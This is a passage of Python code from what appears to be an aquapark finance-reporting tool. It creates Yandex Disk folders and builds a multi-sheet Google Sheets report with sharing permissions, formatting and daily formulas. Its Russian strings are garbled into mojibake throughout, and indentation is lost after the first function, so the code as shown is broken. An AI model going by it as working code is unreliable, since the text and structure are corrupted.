    list_path.append(self.date_from.strftime('%m') + '-' + self.date_from.strftime('%B'))
    directory = '/'
    list_path_yandex = []
    # Turn the relative components into absolute remote paths, one per
    # nesting level: /a, /a/b, /a/b/c, ...
    for folder in list_path:
        folder = directory + folder
        directory = folder + '/'
        list_path_yandex.append(folder)
    directory = '/'
    # Walk the levels top-down, creating each folder that the remote
    # listing of its parent does not yet contain.
    for folder in list_path_yandex:
        folders_list = []
        folders_list_yandex = list(self.yadisk.listdir(directory))
        for key in folders_list_yandex:
            # Entries with key['file'] falsy are folders.
            if not key['file']:
                folders_list.append(directory + key['name'])
        if folder not in folders_list:
            self.yadisk.mkdir(folder)
            logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะทะดะฐะฝะธะต ะฝะพะฒะพะน ะฟะฐะฟะบะธ ะฒ YandexDisk - "{folder}"')
            directory = folder + '/'
        else:
            directory = folder + '/'
    path = list_path_yandex[-1] + '/'
    return path
def export_to_google_sheet(self):
"""
ะคะพัะผะธัะพะฒะฐะฝะธะต ะธ ะทะฐะฟะพะปะฝะตะฝะธะต google-ัะฐะฑะปะธัั
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพั
ัะฐะฝะตะฝะธะต ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฒ Google-ัะฐะฑะปะธัะฐั
...')
self.doc_version = 10
self.sheet_width = 44
self.sheet2_width = 3
self.sheet3_width = 14
self.sheet4_width = 3
self.sheet5_width = 3
self.sheet6_width = 16
self.height = 40
self.sheet2_height = 40
self.sheet4_height = 300
self.sheet5_height = 300
self.sheet6_height = 40
# self.CREDENTIALS_FILE # ะธะผั ัะฐะนะปะฐ ั ะทะฐะบััััะผ ะบะปััะพะผ
credentials = ServiceAccountCredentials.from_json_keyfile_name(self.CREDENTIALS_FILE,
['https://www.googleapis.com/auth/spreadsheets',
'https://www.googleapis.com/auth/drive'])
httpAuth = credentials.authorize(httplib2.Http())
try:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะพะฟััะบะฐ ะฐะฒัะพัะธะทะฐัะธะธ ั Google-ะดะพะบัะผะตะฝัะฐะผะธ ...')
self.googleservice = apiclient.discovery.build('sheets', 'v4', http=httpAuth)
except IndexError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
self.data_report = datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%m')
month = [
'',
'ะฏะฝะฒะฐัั',
'ะคะตะฒัะฐะปั',
'ะะฐัั',
'ะะฟัะตะปั',
'ะะฐะน',
'ะัะฝั',
'ะัะปั',
'ะะฒะณััั',
'ะกะตะฝััะฑัั',
'ะะบััะฑัั',
'ะะพัะฑัั',
'ะะตะบะฐะฑัั',
]
self.data_report = month[int(self.data_report)]
doc_name = f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y-%m')} " \
f"({self.data_report}) - ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฟะพ ะะบะฒะฐะฟะฐัะบั"
if self.finreport_dict['ะะฐัะฐ'][0] + timedelta(1) != self.finreport_dict['ะะฐัะฐ'][1]:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะญะบัะฟะพัั ะพััะตัะฐ ะฒ Google Sheet ะทะฐ ะฝะตัะบะพะปัะบะพ ะดะฝะตะน ะฝะตะฒะพะทะผะพะถะตะฝ!')
self.show_dialog('ะัะธะฑะบะฐ ัะบัะฟะพััะฐ ะฒ Google.Sheet',
'ะญะบัะฟะพัั ะพััะตัะฐ ะฒ Google Sheet ะทะฐ ะฝะตัะบะพะปัะบะพ ะดะฝะตะน ะฝะตะฒะพะทะผะพะถะตะฝ!')
else:
with open(self.list_google_docs, 'r', encoding='utf-8') as f:
links = csv.reader(f, delimiter=';')
self.google_links = {}
for line in links:
self.google_links[line[0]] = [line[1],]
if len(line) > 2:
self.google_links[line[0]].append(line[2])
else:
self.google_links[line[0]].append(0)
if self.date_from.strftime('%Y-%m') in self.google_links:
if int(self.google_links[self.date_from.strftime('%Y-%m')][1]) == self.doc_version:
self.google_doc = (self.date_from.strftime('%Y-%m'),
self.google_links[self.date_from.strftime('%Y-%m')][0])
else:
logging.error(f"{__name__}: {str(datetime.now())[:-7]}: "
f"ะะตััะธั ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ("
f"{self.google_links[self.date_from.strftime('%Y-%m')][1]}) "
f"ะฝะต ัะพะพัะฒะตัััะฒัะตั ัะตะบััะตะน ({self.doc_version}).\n"
f"ะะตะพะฑั
ะพะดะธะผะพ ัะฝะฐัะฐะปะฐ ัะดะฐะปะธัั ัััะพะบั ั ัััะปะบะพะน ะฝะฐ ััะฐััั ะฒะตััะธั ะธะท ัะฐะนะปะฐ "
f"\"list_google_docs.csv\" ะทะฐัะตะผ ะทะฐะฝะพะฒะพ ััะพัะผะธัะพะฒะฐัั ะพััะตั ั ะฝะฐัะฐะปะฐ ะผะตัััะฐ."
)
self.show_dialog("ะะตัะพะพัะฒะตัััะฒะธะต ะฒะตััะธะน ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ",
f"ะะตััะธั ะคะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ("
f"{self.google_links[self.date_from.strftime('%Y-%m')][1]}) "
f"ะฝะต ัะพะพัะฒะตัััะฒัะตั ัะตะบััะตะน ({self.doc_version}).\n"
f"ะะตะพะฑั
ะพะดะธะผะพ ัะฝะฐัะฐะปะฐ ัะดะฐะปะธัั ัััะพะบั ั ัััะปะบะพะน ะฝะฐ ััะฐััั ะฒะตััะธั ะธะท ัะฐะนะปะฐ "
f"\"list_google_docs.csv\" ะทะฐัะตะผ ะทะฐะฝะพะฒะพ ััะพัะผะธัะพะฒะฐัั ะพััะตั ั ะฝะฐัะฐะปะฐ ะผะตัััะฐ.")
return None
else:
self.google_doc = None
# ะกะพะทะดะฐะฝะธะต ะดะพะบัะผะตะฝัะฐ
self.google_kwote_timer = datetime.now()
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต Google-ะดะพะบัะผะตะฝัะฐ...')
self.spreadsheet = self.googleservice.spreadsheets().create(body={
'properties': {'title': doc_name, 'locale': 'ru_RU'},
'sheets': [{'properties': {'sheetType': 'GRID',
'sheetId': 0,
'title': 'ะกะฒะพะดะฝัะน',
'gridProperties': {'rowCount': self.height,
'columnCount': self.sheet_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 1,
'title': 'ะกะผะฐะนะป',
'gridProperties': {'rowCount': self.sheet2_height,
'columnCount': self.sheet2_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 2,
'title': 'ะะปะฐะฝ',
'gridProperties': {'rowCount': self.height,
'columnCount': self.sheet3_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 3,
'title': 'ะัะพะณะพะฒัะน',
'gridProperties': {'rowCount': self.sheet4_height,
'columnCount': self.sheet4_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 4,
'title': 'ะัะพะณะพะฒัะน ะะ',
'gridProperties': {'rowCount': self.sheet5_height,
'columnCount': self.sheet5_width}}},
{'properties': {'sheetType': 'GRID',
'sheetId': 5,
'title': 'ะะปัะถ',
'gridProperties': {'rowCount': self.sheet6_height,
'columnCount': self.sheet6_width}}}
]
}).execute()
# ะะพัััะฟั ะบ ะดะพะบัะผะตะฝัั
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐัััะพะนะบะฐ ะดะพัััะฟะพะฒ ะบ ัะฐะนะปั GoogleSheets...')
self.google_reader_list = self.google_reader_list.split(',')
self.google_writer_list = self.google_writer_list.split(',')
driveService = apiclient.discovery.build('drive', 'v3', http=httpAuth)
if self.google_all_read:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'anyone', 'role': 'reader'}, # ะดะพัััะฟ ะฝะฐ ััะตะฝะธะต ะบะพะผั ัะณะพะดะฝะพ
fields='id'
).execute()
# ะะพะทะผะพะถะฝัะต ะทะฝะฐัะตะฝะธั writer, commenter, reader
# ะดะพัััะฟ ะฝะฐ ะงัะตะฝะธะต ะพะฟัะตะดะตะปะตะฝะฝัะผ ะฟะพะปัะทะพะฒะฐัะตะปะพัะผ
for adress in self.google_reader_list:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'user', 'role': 'reader', 'emailAddress': adress},
fields='id'
).execute()
# ะดะพัััะฟ ะฝะฐ ะะฐะฟะธัั ะพะฟัะตะดะตะปะตะฝะฝัะผ ะฟะพะปัะทะพะฒะฐัะตะปะพัะผ
for adress in self.google_writer_list:
shareRes = driveService.permissions().create(
fileId=self.spreadsheet['spreadsheetId'],
body={'type': 'user', 'role': 'writer', 'emailAddress': adress},
fields='id'
).execute()
# ะะะกะข 1
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 1 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 0
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 105)
ss.prepare_setColumnsWidth(2, 7, 120)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
ss.prepare_setColumnsWidth(11, 12, 100)
ss.prepare_setColumnWidth(13, 65)
ss.prepare_setColumnWidth(14, 120)
ss.prepare_setColumnWidth(15, 100)
ss.prepare_setColumnWidth(16, 65)
ss.prepare_setColumnWidth(17, 120)
ss.prepare_setColumnWidth(18, 100)
ss.prepare_setColumnWidth(19, 65)
ss.prepare_setColumnWidth(20, 120)
ss.prepare_setColumnWidth(21, 100)
ss.prepare_setColumnWidth(22, 65)
ss.prepare_setColumnWidth(23, 120)
ss.prepare_setColumnWidth(24, 100)
ss.prepare_setColumnWidth(25, 65)
ss.prepare_setColumnWidth(26, 120)
ss.prepare_setColumnWidth(27, 100)
ss.prepare_setColumnWidth(28, 65)
ss.prepare_setColumnWidth(29, 120)
ss.prepare_setColumnWidth(30, 100)
ss.prepare_setColumnWidth(31, 65)
ss.prepare_setColumnWidth(32, 120)
ss.prepare_setColumnWidth(33, 100)
ss.prepare_setColumnWidth(34, 65)
ss.prepare_setColumnWidth(35, 120)
ss.prepare_setColumnWidth(36, 100)
ss.prepare_setColumnWidth(37, 65)
ss.prepare_setColumnWidth(38, 120)
ss.prepare_setColumnWidth(39, 65)
ss.prepare_setColumnWidth(40, 120)
ss.prepare_setColumnWidth(41, 100)
ss.prepare_setColumnWidth(42, 120)
ss.prepare_setColumnWidth(43, 120)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:H2")
ss.prepare_mergeCells("I1:K1")
ss.prepare_mergeCells("L1:L2")
ss.prepare_mergeCells("M1:M2")
ss.prepare_mergeCells("N1:P1")
ss.prepare_mergeCells("Q1:S1")
ss.prepare_mergeCells("T1:V1")
ss.prepare_mergeCells("W1:Y1")
ss.prepare_mergeCells("Z1:AB1")
ss.prepare_mergeCells("AC1:AE1")
ss.prepare_mergeCells("AF1:AH1")
ss.prepare_mergeCells("AI1:AK1")
ss.prepare_mergeCells("AL1:AM1")
ss.prepare_mergeCells("AN1:AP1")
ss.prepare_mergeCells("AQ1:AQ2")
ss.prepare_mergeCells("AR1:AR2")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:AR2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:AR2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะคะะะข",
f"ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \n{self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}",
"ะะฑัะฐั ััะผะผะฐ \nะะะะ", "ะะฑัะฐั ััะผะผะฐ \nะคะะะข",
f"ะะฑัะฐั ััะผะผะฐ \n{self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}",
"ะะธะปะตัั", "", "", "ะะตะฟะพะทะธั", "ะจััะฐั", "ะขะตัะผะพะทะพะฝะฐ", "", "", "ะะฑัะตะฟะธั ะะะะ", "", "", "ะะฑัะตะฟะธั ะคะะะข", "", "",
f"ะะฑัะตะฟะธั {self.data_report} "
f"{datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0] - relativedelta(years=1), '%Y')}", "", "",
"ะะธะปะตัั ะะะ ะ", "", "", "ะขะตัะผะพะทะพะฝะฐ ะะะ ะ", "", "", "ะะธะปะตัั ะ ะะ", "", "", "ะขะตัะผะพะทะพะฝะฐ ะ ะะ", "", "",
"ะัะพัะตะต", "", "Online ะัะพะดะฐะถะธ", "", "", "ะกัะผะผะฐ ะฑะตะทะฝะฐะป", "ะกัะผะผะฐ Biglion"
],
[
"", "", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "", "",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "", ""
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:AR2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 2
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 2 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 1
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 2, 105)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:C1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:C2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues(
"A1:C2", [
["ะกะผะฐะนะป", "", ""],
["ะะฐัะฐ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ"]
],
"ROWS"
)
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 3
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 3 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 2
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 100)
ss.prepare_setColumnsWidth(2, 7, 120)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
ss.prepare_setColumnWidth(8, 65)
ss.prepare_setColumnWidth(9, 120)
ss.prepare_setColumnWidth(10, 100)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:H2")
ss.prepare_mergeCells("I1:K1")
ss.prepare_mergeCells("L1:N1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:N2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:N2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะะ ะะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ \nะคะะะข",
"ะะฑัะฐั ััะผะผะฐ \nะะ ะะะะะ", "ะะฑัะฐั ััะผะผะฐ \nะคะะะข",
"ะกัะตะดะฝะธะน ัะตะบ \nะะ ะะะะะ", "ะกัะตะดะฝะธะน ัะตะบ \nะคะะะข",
"ะะฑัะตะฟะธั ะะะะ", "", "", "ะะปัะถ ะะะะ", "", "",
],
[
"", "", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะขัะฐัะธะบ", "ะะฑัะฐั ััะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:N2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ss.runPrepared()
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั 2
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 2 ะฒ ัะฐะนะปะต GoogleSheets...')
# ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
# self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
start_date = datetime.strptime(f"01{self.finreport_dict['ะะฐัะฐ'][0].strftime('%m%Y')}", '%d%m%Y')
enddate = start_date + relativedelta(months=1)
dateline = start_date
self.sheet2_line = 3
while dateline < enddate:
ss.prepare_setValues(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
datetime.strftime(dateline, '%d.%m.%Y'),
weekday_rus[dateline.weekday()],
"",
f'=IF(OR(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line} = "ะะขะะะ";LEFT(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line}; 10) = "ะัะฟะพะปะฝะตะฝะธะต");"";\'ะกะฒะพะดะฝัะน\'!D{self.sheet2_line})',
"",
f'=IF(OR(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line} = "ะะขะะะ";LEFT(\'ะกะฒะพะดะฝัะน\'!A{self.sheet2_line}; 10) = "ะัะฟะพะปะฝะตะฝะธะต");"";\'ะกะฒะพะดะฝัะน\'!G{self.sheet2_line})',
f"=IFERROR(E{self.sheet2_line}/C{self.sheet2_line};0)",
f"=IFERROR(F{self.sheet2_line}/D{self.sheet2_line};0)",
"",
"",
f"=IFERROR(J{self.sheet2_line}/I{self.sheet2_line};0)",
"",
"",
f"=IFERROR(M{self.sheet2_line}/L{self.sheet2_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.sheet2_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.sheet2_line}:N{self.sheet2_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ss.runPrepared()
self.sheet2_line += 1
dateline += timedelta(1)
# ะะขะะะ
ss.prepare_setValues(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
"ะะขะะะ",
"",
f"=SUM(C3:C{self.sheet2_line - 1})",
f"=SUM(D3:D{self.sheet2_line - 1})",
f"=SUM(E3:E{self.sheet2_line - 1})",
f"=SUM(F3:F{self.sheet2_line - 1})",
f"=IFERROR(E{self.sheet2_line}/C{self.sheet2_line};0)",
f"=IFERROR(F{self.sheet2_line}/D{self.sheet2_line};0)",
f"=SUM(I3:I{self.sheet2_line - 1})",
f"=SUM(J3:J{self.sheet2_line - 1})",
f"=IFERROR(J{self.sheet2_line}/I{self.sheet2_line};0)",
f"=SUM(L3:L{self.sheet2_line - 1})",
f"=SUM(M3:M{self.sheet2_line - 1})",
f"=IFERROR(M{self.sheet2_line}/L{self.sheet2_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
